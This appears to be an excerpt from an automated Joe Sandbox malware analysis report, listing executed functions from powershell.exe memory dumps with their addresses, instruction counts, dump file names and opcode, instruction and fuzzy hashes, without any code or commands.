                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2184743750.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ffd34980000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f44b66333ca37579131f0ad35ca158c9141f52354b3915574f98765e8ae42f98
                                                                                                      • Instruction ID: 7c6f1dc1a280fa9c98a6cf6da72690775a9baf44780dbc512524ab04b10d52a7
                                                                                                      • Opcode Fuzzy Hash: f44b66333ca37579131f0ad35ca158c9141f52354b3915574f98765e8ae42f98
                                                                                                      • Instruction Fuzzy Hash: EF31F532B0D9494FEBA5EA5C94A16B877D2EF5A310B5801BFC14DC7197DE2AE805C350
                                                                                                      Function 00007FFD3498334A Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2184743750.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ffd34980000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b6ed7b0090e7fb683889141450841b38738646082f4ab588790d984ebe9cc62e
                                                                                                      • Instruction ID: 9088b3cdc22be1f186be410bc7c292177983b8e166db263822abac6cfd4a2bef
                                                                                                      • Opcode Fuzzy Hash: b6ed7b0090e7fb683889141450841b38738646082f4ab588790d984ebe9cc62e
                                                                                                      • Instruction Fuzzy Hash: 7B117331B0AA494FEBA5DA5C80A517877D2EF5A310B5400BFC54DD7197EE2AA8458311
                                                                                                      Function 00007FFD348B33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2184077903.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ffd348b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction ID: deb5d86c88e8f26112380754d293aded1f7c495d532cba5f2c16f698bcc23440
                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction Fuzzy Hash: E201A73020CB0C4FD744EF0CE051AA6B3E0FB89320F10052DE58AC3651DA36E882CB41

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD348A5C15 Relevance: .6, Instructions: 558COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3481160657.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd348a0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f3fa4e3e39cdb3a1bf3954cf901722df409927086381c07327982230eebe4691
                                                                                                      • Instruction ID: 5e939670278ecef311988ba2f04aba1290e00e5a95f02a34b0ca05c112cd4a7d
                                                                                                      • Opcode Fuzzy Hash: f3fa4e3e39cdb3a1bf3954cf901722df409927086381c07327982230eebe4691
                                                                                                      • Instruction Fuzzy Hash: 5A02E331A09A498FDBD8EF5CC4A5AA977F1FF69310F14417AD40DD7296CA78E882C780
                                                                                                      Function 00007FFD34976A1B Relevance: .2, Instructions: 156COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3482010752.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd34970000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 974130b799626b9f2122e8cf713697720d3a596d8345577670ce15134b5a957f
                                                                                                      • Instruction ID: 553aaedc597159e7d3c31115001f951de077850aa56382ae1b5cfde3bb4425b2
                                                                                                      • Opcode Fuzzy Hash: 974130b799626b9f2122e8cf713697720d3a596d8345577670ce15134b5a957f
                                                                                                      • Instruction Fuzzy Hash: 1241BD96A4E7C51FD75797380CB52617FE4AF53224B0841EFD199CB0E7E90C281AD362
                                                                                                      Function 00007FFD348A5C5C Relevance: .1, Instructions: 131COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3481160657.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd348a0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 36ca57a68c0a33cdfb989450ed732734c2ad0c30432b6ff821873628f7dfeaa8
                                                                                                      • Instruction ID: c283a0eac184d892f0feb7abbb03af2090af7cb8545448b9d28dbb04f7c5c735
                                                                                                      • Opcode Fuzzy Hash: 36ca57a68c0a33cdfb989450ed732734c2ad0c30432b6ff821873628f7dfeaa8
                                                                                                      • Instruction Fuzzy Hash: 8B31053171DA094FDBD8EA0CD8A5A7573E1FB99310B14017ED48EC3256DA6AF882C781
                                                                                                      Function 00007FFD34976A77 Relevance: .1, Instructions: 123COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3482010752.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd34970000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 06de5ce95fdd313ab69c2122b403d001d082a25447b5071861d85c3b9c2fec25
                                                                                                      • Instruction ID: 76dd29046d7f546725ef426a0bd9e0f0c84b2cbaef4ad5162b51b0ed2d5e9308
                                                                                                      • Opcode Fuzzy Hash: 06de5ce95fdd313ab69c2122b403d001d082a25447b5071861d85c3b9c2fec25
                                                                                                      • Instruction Fuzzy Hash: 57419A95A4E7C16FD31397780CB52A07FA4AF43225B0940EFD1C5CB0E7E90C281AD362
                                                                                                      Function 00007FFD3497683F Relevance: .1, Instructions: 88COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3482010752.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd34970000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 852b992b8649748772b106b1b91727561a754aa6d22816aa598e921416b3d382
                                                                                                      • Instruction ID: b5fc2f5d0102d59fc56e6a548ca0aa8ba36a30ebb5ffce55153776e9444dfb91
                                                                                                      • Opcode Fuzzy Hash: 852b992b8649748772b106b1b91727561a754aa6d22816aa598e921416b3d382
                                                                                                      • Instruction Fuzzy Hash: 9421E522B0DA4A4FE795DA5898B16A87AD2FF96320F4840BED50CC71A7DE2DEC409311
                                                                                                      Function 00007FFD34976883 Relevance: .1, Instructions: 64COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3482010752.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd34970000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f126ced56456c1c29257e07b17886b3c0cc24561d667b42002207d601f476844
                                                                                                      • Instruction ID: 7b07eba2b90a41abab815bdd8f668e5a7ec004f14e2ef6d11aa604c873bb07b9
                                                                                                      • Opcode Fuzzy Hash: f126ced56456c1c29257e07b17886b3c0cc24561d667b42002207d601f476844
                                                                                                      • Instruction Fuzzy Hash: 3411D332B19A4A4FE795DB1888B15A877E2FF85220B5840BAD10CC31A6DE2DEC458300
                                                                                                      Function 00007FFD348A3535 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3481160657.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd348a0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction ID: aff2cc03dc7dc4a920766b02131dbf81e79ecbd7a63877e6cbf50e5921a8226b
                                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction Fuzzy Hash: A501677121CB0C4FD748EF4CE451AA5B7E0FB99364F10056DE58AC3651DA36E881CB45
                                                                                                      Function 00007FFD348A5D58 Relevance: .0, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3481160657.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd348a0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b584d980c39be3df208a24adfabbac4d20d62510530f5dcc64da21f7b37f9099
                                                                                                      • Instruction ID: 4ae68da80f8f1cfdba51d7d57671cad52c12faf547de239fa0d676b6f7756426
                                                                                                      • Opcode Fuzzy Hash: b584d980c39be3df208a24adfabbac4d20d62510530f5dcc64da21f7b37f9099
                                                                                                      • Instruction Fuzzy Hash: 42F06C3275C6044FDB5CAA5CF4529B573E1E795320B10017EF48BC3697D927F842C685